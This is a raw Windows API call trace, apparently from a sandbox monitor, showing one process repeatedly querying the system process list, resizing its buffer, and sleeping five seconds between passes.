[0124.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.330] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.338] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.356] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.368] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.385] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.402] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.417] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.430] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.446] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.463] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.477] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.493] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.509] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.524] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.539] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.556] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.571] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.587] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.602] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.619] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.633] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.646] 